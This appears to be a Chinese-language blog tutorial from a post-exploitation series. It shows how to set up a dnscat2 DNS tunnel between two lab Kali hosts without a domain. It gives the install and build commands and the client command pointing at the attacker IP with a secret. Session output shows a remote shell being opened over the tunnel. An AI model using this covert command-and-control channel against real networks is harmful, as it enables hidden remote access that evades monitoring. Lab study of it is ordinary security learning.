dns隧道之dnscat2(无域名操作)

最新推荐文章于 2024-07-10 14:06:03 发布

努力的学渣'#

最新推荐文章于 2024-07-10 14:06:03 发布

阅读量1.7k

点赞数 1

分类专栏：后渗透、内网学习

本文链接：https://blog.csdn.net/weixin_41598660/article/details/106658548

版权

后渗透、内网学习专栏收录该内容

19 篇文章 3 订阅

订阅专栏

如果主机可以解析域名，或者通过ping来指向IP，那么也可以尝试通过DNS协议传输内部网的通信。 dnscat2为服务端主动连接客户端

先留个坑，因为没有域名所以用ip作为实验，知道操作的一个过程，后面继续完善

环境准备

server端(攻击端ip:192.168.10.144)：

root@kali:~# apt-get update
root@kali:~# apt-get -y install ruby-dev git make g++
root@kali:~# gem install bundler
root@kali:~# git clone https://github.com/iagox86/dnscat2.git

root@kali:~# cd dnscat2/server
root@kali:~/dnscat2/server# bundle install

Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your
bundle as root will break this application for all non-root users on this machine.        
Fetching gem metadata from https://rubygems.org/.......
Using bundler 2.1.4
Fetching ecdsa 1.2.0
Installing ecdsa 1.2.0
Fetching salsa20 0.1.1
Installing salsa20 0.1.1 with native extensions
Fetching sha3 1.0.1
Installing sha3 1.0.1 with native extensions
Fetching trollop 2.1.2
Installing trollop 2.1.2
Bundle complete! 4 Gemfile dependencies, 5 gems now installed.
Use `bundle info [gemname]` to see where a bundled gem is installed.

对第二台kaili进行client端的编译

root@kali:~# git clone https://github.com/iagox86/dnscat2.git
root@kali:~# cd dnscat2/client
root@kali:~/dnscat2/client# make

dns隧道建立

攻击机
root@kali:~/dnscat2/server# ruby ./dnscat2.rb
在这里插入图片描述

root@kali:~/dnscat2/client# ./dnscat --dns server=192.168.10.144 –
secret=0f6da6ab6343bd9a278f02a1691e171d

在这里插入图片描述
命令
dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2> window -i 1

New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
‘ping’! For a full list of clients, try ‘help’.

command (kali) 1>
在这里插入图片描述
打个？就能看到支持的命令有哪些

Shell命令（成功之后会建立一个2的会话，用window -i 2进行连接
command (kali) 1> shell
Sent request to execute a shell
command (kali) 1> New window created: 2
Shell session created!

Exit即可退出
Session命令即可查看有多少个会话

dnscat2> session
0 :: main [active]
crypto-debug :: Debug window for crypto stuff []
dns1 :: DNS Driver running on 0.0.0.0:53 domains = []
1 :: command (kali) [encrypted and verified]

努力的学渣'#

关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
dns隧道之dnscat2(无域名操作)

如果主机可以解析域名，或者通过ping来指向IP，那么也可以尝试通过DNS协议传输内部网的通信。先留个坑，因为没有域名所以用ip作为实验，知道操作的一个过程，后面继续完善环境准备server端(攻击端ip:192.168.10.144)：root@kali:~# apt-get updateroot@kali:~# apt-get -y install ruby-dev git make g++root@kali:~# gem install bundlerroot@kali:~# git c
复制链接

扫一扫

专栏目录